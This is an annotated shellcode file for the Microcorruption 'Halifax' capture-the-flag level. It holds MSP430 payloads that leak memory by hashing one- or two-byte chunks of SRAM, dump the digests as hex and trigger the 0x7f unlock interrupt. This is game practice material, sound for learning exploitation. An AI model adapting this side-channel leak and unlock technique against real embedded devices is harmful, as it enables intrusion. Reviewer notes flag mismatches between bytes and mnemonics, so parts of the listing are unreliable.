MicroCorruption/25-Halifax/shellcode.asm


; Assembled payload variants, written as hex strings. Each starts with 6000 and
; one further byte, followed by MSP430 code bytes (16-bit words, low byte first).
; NOTE(review): the byte after 6000 looks like a length -- 0x1c matches the 28
; code bytes of the first variant -- but the 0x6c / 0x6d values further down are
; 2 and 1 larger than the bytes listed there; confirm the header format.
;
; just the hash loop followed by ret (3041): no dump, input or unlock stage
6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b906000 f72b 3041
; where depth = number of nibbles kept from each truncated hash
; msize = number of message bytes hashed per call (the value loaded into r14)
; NOTE(review): with a 1- or 2-byte message each digest has only 256 or 65536
; possible inputs, so even a truncated digest presumably identifies the hashed
; bytes by table lookup -- hashing short ranges does not hide their contents.
;* depth 8, message size 2
;? completes in 67234 cycles
; hash loop loads #2 into r14 (2e43), advances r13 by 4 (2d52), bound 0x0040;
; the dump loop bound is 0x0100 (3b900001) = 0x40 * 4 bytes.
; lines in order: hash loop, hex dump loop, getsn call, hash call,
; mov #0x7f, r15 + call 0x4550 + ret
6000 6c
0b432e433d4000800f4bb012b6452d521b533b904000f82b
0b435e4b00804f4e0f110f110f110f1112c33ef00f003ff00f005f4f1047b01278455f4e1047b01278451b533b900001e82b
3e4040003f400090b0126845
0f433d400090b012b645
3f407f00b0125045 3041
;* depth 6, message size 1
;? completes in 61899 cycles
; hash loop loads #1 into r14 (1e43), advances r13 by 3 (3d500300), bound 0x0060.
; NOTE(review): the dump loop bound here is 0x00c0 (3b90c000), which is less
; than the 0x60 * 3 = 0x120 bytes the hash loop writes -- confirm this is intended.
6000 6d
0b431e433d4000800f4bb012b6453d5003001b533b906000f72b
0b435e4b00804f4e0f110f110f110f1112c33ef00f003ff00f005f4f1047b01278455f4e1047b01278451b533b90c000e82b
3e4040003f400090b0126845
0f433d400090b012b645
3f407f00b0125045 3041
; get_sram_hashes: call the routine at 0x45b6 once per value of r11, placing
; each result 3 bytes after the previous one, starting at 0x8000.
; Registers at each call: r15 = r11, r14 = 1, r13 = current destination.
; NOTE(review): the argument roles for 0x45b6 (r15 = source address,
; r14 = length, r13 = destination) are inferred from the author's comments in
; this file -- confirm against the firmware listing.
; The loop relies on 0x45b6 leaving r11, r13 and r14 unchanged.
get_sram_hashes:
; assembled bytes for this stage
; NOTE(review): this line has 3b908000 (bound 0x0080) where the annotated
; instruction below has 3b90 6000 (bound 0x0060) -- reconcile.
0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b908000 f72b
0b43 clr r11 ; r11 = loop counter, starts at 0
1e43 mov 0(r3), r14 ; r14 = 1 (constant generated through r3)
3d40 0080 mov #0x8000, r13 ; first destination address is 0x8000
loop:
0f4b mov r11, r15 ; r15 = r11, used as the address to hash (per the author)
b012 b645 call #0x45b6 ; <sha256_internal>
3d50 0300 add #3, r13 ; next result starts 3 bytes later, so 3 bytes of each output are kept
1b53 add 0(r3), r11 ; inc r11
; NOTE(review): the original comment said "0x1000 times"; the loop runs once
; per r11 value below the compare immediate, which the bytes encode as 0x0060
; and the mnemonic gives as 0x80.
3b90 6000 cmp #0x80, r11 ; loop bound (see note above)
f72b jnc $-0x10 ; back to 'mov r11, r15' while r11 is below the bound (unsigned)
; print_hex: for each index r11, load the byte at 0x8000 + r11, split it into
; high and low nibbles, look each nibble up in the table at 0x4710 and pass the
; looked-up byte in r15 to 0x4578 (<putchar> per the author), high nibble first.
; NOTE(review): 0x4710 is presumably a hex-digit table in the firmware -- confirm.
; The loop relies on 0x4578 leaving r11 and r14 unchanged.
print_hex:
; assembled bytes for this stage
0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b90 c000 e82b
0b43 clr r11; r11 = byte index, starts at 0
5e4b 0080 mov.b 0x8000(r11), r14 ; r14 = byte to print
4f4e mov.b r14, r15 ; r15 = copy used for the high nibble
; four one-bit right shifts bring the high nibble down to bits 3..0
; NOTE(review): 0f11 looks like the word form (rra r15); the byte form would
; be 4f11 -- confirm. The result is masked with 0xf below either way.
0f11 rra.b r15
0f11 rra.b r15
0f11 rra.b r15
0f11 rra.b r15
12c3 clrc ; clear the carry flag
3ef0 0f00 and #0xf, r14 ; r14 = low nibble
3ff0 0f00 and #0xf, r15 ; r15 = high nibble
5f4f 1047 mov.b 0x4710(r15), r15 ; r15 = table[high nibble]
b012 7845 call #0x4578 ; <putchar>
5f4e 1047 mov.b 0x4710(r14), r15 ; r15 = table[low nibble]
b012 7845 call #0x4578 ; <putchar>
1b53 add 0(r3), r11 ; inc r11
; NOTE(review): the bytes 3b90 c000 encode the immediate 0x00c0, while the
; mnemonic says 0x120 (= 0x60*3) -- reconcile before reusing this listing.
3b90 c000 cmp #0x120, r11 ; loop bound on the number of bytes printed
; NOTE(review): e82b appears to encode a displacement of -0x2e (back to the
; 'mov.b 0x8000(r11), r14' above), not the -0x28 in the mnemonic -- confirm.
e82b jnc $-0x28 ; repeat while r11 is below the bound (unsigned)
; take_input: call 0x4568 (<getsn> per the author) with r15 = 0x9000 and
; r14 = 0x40.
; NOTE(review): presumably r15 is the destination buffer and r14 the maximum
; number of bytes to read -- confirm against the firmware listing.
take_input:
; assembled bytes for this stage
3e4040003f400090b0126845
3e40 4000 mov #0x40, r14 ; r14 = 0x40
3f40 0090 mov #0x9000, r15 ; r15 = 0x9000
b012 6845 call #0x4568; <getsn>
; check_password_questionmark: call 0x45b6 (<sha256_internal> per the author)
; with r15 = 0 and r13 = 0x9000.
; r14 is not loaded here (the mov below is commented out and absent from the
; assembled bytes), so the call sees whatever value r14 holds on entry.
; NOTE(review): the purpose of this stage is not stated in the file; 0x9000 is
; also the address passed to <getsn> in take_input -- confirm the intent.
check_password_questionmark:
; assembled bytes for this stage
0f433d400090b012b645
0f43 clr r15 ; r15 = 0
; disabled instruction, kept for reference:
;3e40 0010 mov #0x1000, r14 ; set length to 0x1000
3d40 0090 mov #0x9000, r13 ; set buffer to 0x9000
b012 b645 call #0x45b6 ; <sha256_internal>
; unlock7f: two alternative byte sequences, both ending in ret.
;   1) write 0xff00 to sr, call 0x10, clear sr
;   2) push 0x7f, call 0x4550
; NOTE(review): presumably the high byte of sr (0xff = 0x80 | 0x7f) selects
; request 0x7f for the gate at 0x10, and 0x4550 is the firmware wrapper for the
; same gate -- confirm against the firmware listing.
; NOTE(review): the assembled payloads at the top of the file use
; 3f40 7f00 (mov #0x7f, r15) before the call to 0x4550 rather than this push.
unlock7f:
; variant 1, assembled bytes
324000ffb0121000 0243 3041
324000ff mov #ff00, sr ; sr = 0xff00
b0121000 call #0x10 ; call the routine at 0x0010
0243 mov #0, sr ; sr = 0 again after the call
; variant 2, assembled bytes
30127f00b0125045
3012 7f00 push 0x7f ; pushes the immediate 0x7f
b012 5045 call 0x4550 ; call the routine at 0x4550
3041 ret